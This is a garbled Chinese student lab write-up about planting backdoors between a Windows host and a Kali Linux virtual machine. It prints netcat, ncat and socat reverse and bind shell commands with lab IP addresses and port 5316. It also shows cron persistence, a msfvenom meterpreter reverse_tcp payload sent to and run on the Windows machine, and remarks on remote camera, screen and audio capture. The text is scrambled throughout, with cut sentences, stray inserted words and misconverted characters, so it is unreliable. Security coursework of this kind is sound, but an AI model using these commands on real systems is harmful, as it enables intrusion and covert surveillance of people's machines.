從網絡上下載來路不明的盜版軟件、壓縮包,還有一些小視頻……linux
取得shell後遠程直接執行後門這個可執行文件。shell
感受它超級強大……每一個功能都很讓我印象深入!開攝像頭,看界面,錄音頻……徹底沒有任何隱私可言啊。windows
若是翻看任務管理器時,機器內存佔用很是嚴重,關掉主要應用程序仍是有佔用,任務裏有並不認識的exe程序,那頗有可能就是被安裝了後門。bash
由於我是win10系統,自己存在必定的堅固性,因此最後的提權暫時沒作出來,準備以後本身再按個虛擬機或者借同窗的win7系統完善一下。網絡
ncat
軟件,我安裝在了C盤根目錄下了。ipconfig
和ifconfig
指令分別查看windows主機和kali虛擬機的ip地址。分別爲kali:192.168.234.140
windows:172.30.0.152
ncat.exe -l -p 5316
監聽nc 172.30.0.152 5316 -e /bin/sh
反彈鏈接windowswindows得到linux的shell
tcp
nc -l -p 5316
命令於5316端口進行監聽ncat.exe -e cmd.exe 192.168.234.140 5316
命令經過5316端口反彈鏈接linux主機linux得到windows的shell
3d
crontab -e
命令修改用戶的cron配置,彈出一個vi界面cron啓動成功
code
socat tcp-listen:5316
把cmd綁定到端口5208socat tcp-l:5316 system:bash,pty,stderr
反彈鏈接socat readline tcp:192.168.234.140:5316
開啓監聽成功,用ls檢驗視頻
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.234.140 LPORT=5316 -f exe >20145316.exe
來生成後門程序,而後發送到windows機中。ncat.exe -lv 5316 >20145316.exe
ncat -nv 172.30.0.152 5316 < 20145316.exe
傳送後門程序監聽開始,在windows雙擊20145316.exe運行後門程序,實現遠程控制
blog
windows上任務管理器能夠看到後門正在運行